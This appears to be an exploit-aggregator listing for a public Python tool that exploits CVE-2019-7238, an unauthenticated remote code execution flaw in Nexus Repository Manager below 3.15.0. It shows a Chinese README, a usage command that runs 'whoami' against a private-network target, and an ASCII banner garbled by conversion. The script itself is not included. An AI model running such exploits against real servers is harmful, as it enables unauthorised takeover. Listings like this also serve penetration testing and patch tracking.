Sploitus

Exploit for CVE-2019-7238

kitploit · 2026-08-25

Exploit Code

MARKDOWN26 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JAS502N-CVE-2019-7238
# CVE-2019-7238 Nexus Repository Manager 远程代码执行

Nexus Repository Manager 3 无需身份验证的远程代码执行 (版本 < 3.15.0)

![](https://assets.kitploit.com/production/public/readmes/27353/89934415868c48fa6f5ce5b46d5d299f4878daab767613c6a111bed078b01acd.jpg)

![asciicast](https://asciinema.org/a/aMzvEr29h9txT5TrtF8loyFQp.svg)

### Python 使用方法

`python CVE-2019-7238.py http://10.10.20.166:8081 whoami` ``` jas502n@pentest ~/Pentester/CVE-2019-7238 python CVE-2019-7238.py http://10.10.20.166:8081/ whoami

* * *

/ __**\ \ / /__**| |** \ / _ /_ |/ _ \ |_**_ |__ |___ \ / _   
| | \ \ / /| |__ ______ ) | | | || | (_) |_ _____ / / ) | **) | (_) | | | \ / / |**|**_**_/ /| | | || |__ , |******/ / / / |** < > _ < | |**** \ / | |____ / /_| |_ | || | / / / / / /_ **_) | (_) | _****| / |******| |**** |_**/ |_| /_ / /_/ |_**_|_ _**/ _** /

root@kitploit:~
    
    
                        Nexus RCE < 3.15.0
    
                        Python By jas502n
    
             python  CVE-2019-7238.py http://10.10.20.166:8081 whoami